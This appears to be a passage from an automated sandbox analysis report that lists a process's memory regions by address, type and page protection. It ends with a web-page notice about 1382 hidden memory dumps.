trusted library allocation
|
page read and write
|
||
|
3502000
|
trusted library allocation
|
page read and write
|
||
|
83E000
|
stack
|
page read and write
|
||
|
2BE000
|
heap
|
page read and write
|
||
|
34E000
|
heap
|
page read and write
|
||
|
4D19000
|
heap
|
page read and write
|
||
|
130000
|
heap
|
page read and write
|
||
|
624000
|
heap
|
page read and write
|
||
|
3349000
|
heap
|
page read and write
|
||
|
377C000
|
trusted library allocation
|
page read and write
|
||
|
471D000
|
heap
|
page read and write
|
||
|
450A000
|
heap
|
page read and write
|
||
|
4DF6000
|
heap
|
page read and write
|
||
|
3E6000
|
heap
|
page read and write
|
||
|
322000
|
heap
|
page read and write
|
||
|
1C54C000
|
stack
|
page read and write
|
||
|
44F8000
|
heap
|
page read and write
|
||
|
33A4000
|
heap
|
page read and write
|
||
|
450D000
|
heap
|
page read and write
|
||
|
475B000
|
heap
|
page read and write
|
||
|
7FE899C0000
|
trusted library allocation
|
page read and write
|
||
|
34E0000
|
heap
|
page read and write
|
||
|
4599000
|
heap
|
page read and write
|
||
|
468E000
|
heap
|
page read and write
|
||
|
3FD000
|
heap
|
page read and write
|
||
|
308000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
4D97000
|
heap
|
page read and write
|
||
|
3B00000
|
trusted library allocation
|
page read and write
|
||
|
34C0000
|
remote allocation
|
page read and write
|
||
|
324000
|
heap
|
page read and write
|
||
|
7D1000
|
unkown
|
page read and write
|
||
|
3DBF000
|
trusted library allocation
|
page read and write
|
||
|
408000
|
unkown
|
page readonly
|
||
|
12C000
|
heap
|
page read and write
|
||
|
280000
|
heap
|
page read and write
|
||
|
342A000
|
heap
|
page read and write
|
||
|
321000
|
heap
|
page read and write
|
||
|
2B0000
|
trusted library allocation
|
page read and write
|
||
|
33D9000
|
heap
|
page read and write
|
||
|
494000
|
heap
|
page read and write
|
||
|
4C16000
|
heap
|
page read and write
|
||
|
474000
|
heap
|
page read and write
|
||
|
634000
|
heap
|
page read and write
|
||
|
4596000
|
heap
|
page read and write
|
||
|
34FD000
|
trusted library allocation
|
page read and write
|
||
|
111000
|
heap
|
page read and write
|
||
|
442B000
|
stack
|
page read and write
|
||
|
213F000
|
stack
|
page read and write
|
||
|
7FE89AE9000
|
trusted library allocation
|
page read and write
|
||
|
4703000
|
heap
|
page read and write
|
||
|
458B000
|
heap
|
page read and write
|
||
|
350000
|
heap
|
page read and write
|
||
|
33C3000
|
heap
|
page read and write
|
||
|
4DCA000
|
heap
|
page read and write
|
||
|
450F000
|
heap
|
page read and write
|
||
|
1C315000
|
heap
|
page read and write
|
||
|
7FE8B1C0000
|
trusted library allocation
|
page read and write
|
||
|
100000
|
heap
|
page read and write
|
||
|
277F000
|
trusted library allocation
|
page read and write
|
||
|
3384000
|
heap
|
page read and write
|
||
|
352A000
|
direct allocation
|
page execute and read and write
|
||
|
34F6000
|
trusted library allocation
|
page read and write
|
||
|
1A639000
|
stack
|
page read and write
|
||
|
1A7BE000
|
heap
|
page read and write
|
||
|
266000
|
heap
|
page read and write
|
||
|
45C000
|
heap
|
page read and write
|
||
|
7FE89A20000
|
trusted library allocation
|
page read and write
|
||
|
3635000
|
trusted library allocation
|
page read and write
|
||
|
134000
|
heap
|
page read and write
|
||
|
7FE89B18000
|
trusted library allocation
|
page read and write
|
||
|
46C000
|
heap
|
page read and write
|
||
|
2628000
|
heap
|
page read and write
|
||
|
1DB0000
|
heap
|
page execute and read and write
|
||
|
322000
|
heap
|
page read and write
|
||
|
2280000
|
heap
|
page read and write
|
||
|
7FE8B040000
|
trusted library allocation
|
page read and write
|
||
|
1AA98000
|
stack
|
page read and write
|
||
|
240000
|
heap
|
page read and write
|
||
|
446000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
474000
|
heap
|
page read and write
|
||
|
252D000
|
trusted library allocation
|
page read and write
|
||
|
18C000
|
stack
|
page read and write
|
||
|
583000
|
direct allocation
|
page read and write
|
||
|
2190000
|
heap
|
page read and write
|
||
|
7FE8978D000
|
trusted library allocation
|
page execute and read and write
|
||
|
26B0000
|
trusted library allocation
|
page read and write
|
||
|
3B4D000
|
trusted library allocation
|
page read and write
|
||
|
3352000
|
heap
|
page read and write
|
||
|
3C8A000
|
trusted library allocation
|
page read and write
|
||
|
3B4D000
|
trusted library allocation
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
3C8A000
|
trusted library allocation
|
page read and write
|
||
|
451C000
|
heap
|
page read and write
|
||
|
7FE8993C000
|
trusted library allocation
|
page read and write
|
||
|
5BE000
|
heap
|
page read and write
|
||
|
314000
|
heap
|
page read and write
|
||
|
3B4D000
|
trusted library allocation
|
page read and write
|
||
|
458D000
|
heap
|
page read and write
|
||
|
3DBF000
|
trusted library allocation
|
page read and write
|
||
|
33C6000
|
heap
|
page read and write
|
||
|
43A0000
|
heap
|
page read and write
|
||
|
4DD6000
|
heap
|
page read and write
|
||
|
7FE89784000
|
trusted library allocation
|
page read and write
|
||
|
217D000
|
stack
|
page read and write
|
||
|
3C8A000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B03B000
|
trusted library allocation
|
page read and write
|
||
|
459A000
|
heap
|
page read and write
|
||
|
1B1D6000
|
heap
|
page read and write
|
||
|
25E0000
|
trusted library allocation
|
page read and write
|
||
|
4651000
|
heap
|
page read and write
|
||
|
4AE000
|
heap
|
page read and write
|
||
|
33A6000
|
heap
|
page read and write
|
||
|
470000
|
heap
|
page read and write
|
||
|
28D000
|
heap
|
page read and write
|
||
|
18E000
|
heap
|
page read and write
|
||
|
1EE0000
|
direct allocation
|
page read and write
|
||
|
3D9B000
|
stack
|
page read and write
|
||
|
2300000
|
heap
|
page read and write
|
||
|
4C12000
|
heap
|
page read and write
|
||
|
7FE89A75000
|
trusted library allocation
|
page read and write
|
||
|
308000
|
heap
|
page read and write
|
||
|
1B42B000
|
stack
|
page read and write
|
||
|
7FFFFF00000
|
trusted library allocation
|
page execute and read and write
|
||
|
3B4D000
|
trusted library allocation
|
page read and write
|
||
|
363F000
|
trusted library allocation
|
page read and write
|
||
|
314000
|
heap
|
page read and write
|
||
|
1B0DE000
|
stack
|
page read and write
|
||
|
3B4A000
|
trusted library allocation
|
page read and write
|
||
|
1A8AF000
|
heap
|
page read and write
|
||
|
3F2F000
|
stack
|
page read and write
|
||
|
413000
|
heap
|
page read and write
|
||
|
2D5000
|
heap
|
page read and write
|
||
|
4500000
|
heap
|
page read and write
|
||
|
363F000
|
trusted library allocation
|
page read and write
|
||
|
1D0000
|
trusted library allocation
|
page read and write
|
||
|
4D97000
|
heap
|
page read and write
|
||
|
1AD80000
|
heap
|
page read and write
|
||
|
124BD000
|
trusted library allocation
|
page read and write
|
||
|
4594000
|
heap
|
page read and write
|
||
|
332B000
|
stack
|
page read and write
|
||
|
46A8000
|
heap
|
page read and write
|
||
|
7FE8B224000
|
trusted library allocation
|
page read and write
|
||
|
3F2000
|
heap
|
page read and write
|
||
|
1B77E000
|
stack
|
page read and write
|
||
|
4B20000
|
trusted library allocation
|
page read and write
|
||
|
4DF4000
|
heap
|
page read and write
|
||
|
12471000
|
trusted library allocation
|
page read and write
|
||
|
23AB000
|
heap
|
page read and write
|
||
|
4720000
|
heap
|
page read and write
|
||
|
33D9000
|
heap
|
page read and write
|
||
|
33A6000
|
heap
|
page read and write
|
||
|
1C249000
|
heap
|
page read and write
|
||
|
6A2B6000
|
unkown
|
page readonly
|
||
|
497000
|
heap
|
page read and write
|
||
|
4C33000
|
heap
|
page read and write
|
||
|
5120000
|
heap
|
page read and write
|
||
|
5149000
|
heap
|
page read and write
|
||
|
29BF000
|
stack
|
page read and write
|
||
|
450D000
|
heap
|
page read and write
|
||
|
464C000
|
heap
|
page read and write
|
||
|
474000
|
heap
|
page read and write
|
||
|
1CA0B000
|
stack
|
page read and write
|
||
|
7FE899F0000
|
trusted library allocation
|
page read and write
|
||
|
244000
|
heap
|
page read and write
|
||
|
4B20000
|
trusted library allocation
|
page read and write
|
||
|
3C8A000
|
trusted library allocation
|
page read and write
|
||
|
1F80000
|
heap
|
page read and write
|
||
|
33BB000
|
heap
|
page read and write
|
||
|
7FE8B310000
|
trusted library allocation
|
page read and write
|
||
|
3B4A000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B2F0000
|
trusted library allocation
|
page read and write
|
||
|
955000
|
heap
|
page read and write
|
||
|
3AFF000
|
stack
|
page read and write
|
||
|
7FE8B1D3000
|
trusted library allocation
|
page read and write
|
||
|
458A000
|
heap
|
page read and write
|
||
|
4DD1000
|
heap
|
page read and write
|
||
|
1C4B0000
|
heap
|
page read and write
|
||
|
2B25000
|
trusted library allocation
|
page read and write
|
||
|
3DBF000
|
trusted library allocation
|
page read and write
|
||
|
4490000
|
heap
|
page read and write
|
||
|
7FE899D0000
|
trusted library allocation
|
page read and write
|
||
|
40A000
|
heap
|
page read and write
|
||
|
2471000
|
trusted library allocation
|
page read and write
|
||
|
7FE8B210000
|
trusted library allocation
|
page execute and read and write
|
||
|
43A1000
|
heap
|
page read and write
|
||
|
907000
|
heap
|
page read and write
|
||
|
3DE2000
|
trusted library allocation
|
page read and write
|
||
|
62B000
|
heap
|
page read and write
|
||
|
168000
|
heap
|
page read and write
|
||
|
3635000
|
trusted library allocation
|
page read and write
|
||
|
34FE000
|
trusted library allocation
|
page read and write
|
||
|
321000
|
heap
|
page read and write
|
||
|
363F000
|
trusted library allocation
|
page read and write
|
There are 1382 hidden memdumps, click here to show them.